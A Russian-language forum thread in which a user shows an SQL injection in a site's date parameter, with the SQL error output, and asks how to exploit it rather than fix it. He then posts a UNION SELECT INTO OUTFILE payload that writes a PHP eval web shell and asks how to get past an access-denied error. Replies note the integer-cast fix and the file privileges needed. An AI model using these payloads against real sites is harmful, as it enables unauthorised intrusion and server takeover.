Поиск  Пользователи  Правила 
Закрыть
Логин:
Пароль:
Забыли свой пароль?
Войти
 
Страницы: 1
RSS
sql injection, требуется помощь
 
Приветствую всех участников форума!
Сижу, думаю... Не могу решить проблему...

index.php?&date695=200203'

<!-- Select: SQL error<br>SQL=SELECT * FROM CONTENT_MAP,GTK_NEWS WHERE CONTENT_MAP.INF_BLOCK_ID=702 AND GTK_NEWS.CONTENT_ID=CONTENT_MAP.CONTENT_ID AND GTK_NEWS.VERSION=0 AND GTK_NEWS.LANG_ID=121 AND GTK_NEWS.NEWS_DATE LIKE '%200203'%' ORDER BY GTK_NEWS.NEWS_DATE DESC -->

index.php?&date695=200203%'+GROUP+BY+10--

<!-- FetchArray: Unknown SQL result<br>SQL=SELECT * FROM CONTENT_MAP,GTK_NEWS WHERE CONTENT_MAP.INF_BLOCK_ID=702 AND GTK_NEWS.CONTENT_ID=CONTENT_MAP.CONTENT_ID AND GTK_NEWS.VERSION=0 AND GTK_NEWS.LANG_ID=121 AND GTK_NEWS.NEWS_DATE LIKE '%200203%' GROUP BY 10--%' ORDER BY GTK_NEWS.NEWS_DATE DESC -->

GROUP BY и прочее не работают.. я подозреваю что дело в "FROM CONTENT_MAP,GTK_NEWS".

Как быть в таком случае?
Направте плз в нужную сторону...
 
А в чем проблема?
Чтобы избавиться от SQL инъекции - надо привести в скрипте значение этого параметра к целочисленному типу.
 
Цитата
phoenix пишет:
А в чем проблема?

Чтобы избавиться от SQL инъекции - надо привести в скрипте значение этого параметра к целочисленному типу.
=) Полностью согласен. А чтобы не избавиться, а использовать её? Например из таблицы GTK_NEWS сделать листинг данных из колонки NEWS_DATE? Вот в чем вопрос уважаемый phoenix.
Изменено: Evildevel - 02.12.2010 15:35:37
 
а что вы хотите,там же все жестко прописано
Цитата
...WHERE CONTENT_MAP.INF_BLOCK_ID=702 AND...
единственное можно попробовать использовать like... как я понял 200203 это 20.02.2003 ,соответственно like '%дата%'
:idea:
Изменено: MidNigHT_r - 02.12.2010 16:15:18
 
Ребята, а как можно загрузить шелл через sql injection?

Я делаю так:
?id=-1'+UNION+SELECT+1,'<?php%20eval($_GET[‘e’])%20?>',3+INTO+OUTFILE+'1.php'--%20'

И получаю:
Access denied for user 'xxx'@'localhost' (using password: YES)

Как можно попробывать обойти этот момент? Очень нужно... В БД нет никакой щстоящей информации...

Вот еще.. некоторые данные:
Apache/2.2.10 (Linux/SUSE)
PHP/5.2.9

MYSQL VERSION 5.0.67
Изменено: Evildevel - 03.12.2010 00:39:53
 
Цитата
Evildevel пишет:
Ребята, а как можно загрузить шелл через sql injection?



Я делаю так:

?id=-1'+UNION+SELECT+1,'<?php%20eval($_GET[‘e’])%20?>',3+INTO+OUTFILE+'1.php'--%20'



И получаю:

Access denied for user 'xxx'@'localhost' (using password: YES)



Как можно попробывать обойти этот момент? Очень нужно... В БД нет никакой щстоящей информации...



Вот еще.. некоторые данные:

Apache/2.2.10 (Linux/SUSE)

PHP/5.2.9



MYSQL VERSION 5.0.67

у пользователя 'xxx'@'localhost'  установлен пароль,соответственно,чтобы чото делать надо залогиница,а уж потом если повезет и у юзера будут установлены file_priv  :o  то можно и попробовать чтото прочитать,а если установлены у пользователя права и на запись  :o  то и записать можно попробовать в файл ваш супер php шелл  :o  да и то только в ту директорию на сервере куда разрешена запись  :o
 
Цитата
MidNigHT_r пишет:
да и то только в ту директорию на сервере куда разрешена запись

Уху. И с полномочиями того юзверя, от имени которого выполняются php-скрипты (c кучей условий - если не используется suexec - что было бы глупо и т.д. и т.п.). Обычно apache.apache. И с учетом того, что обычно этот юзверь не имеет собственного шелла. По вполне понятным причинам. :)
Страницы: 1
Читают тему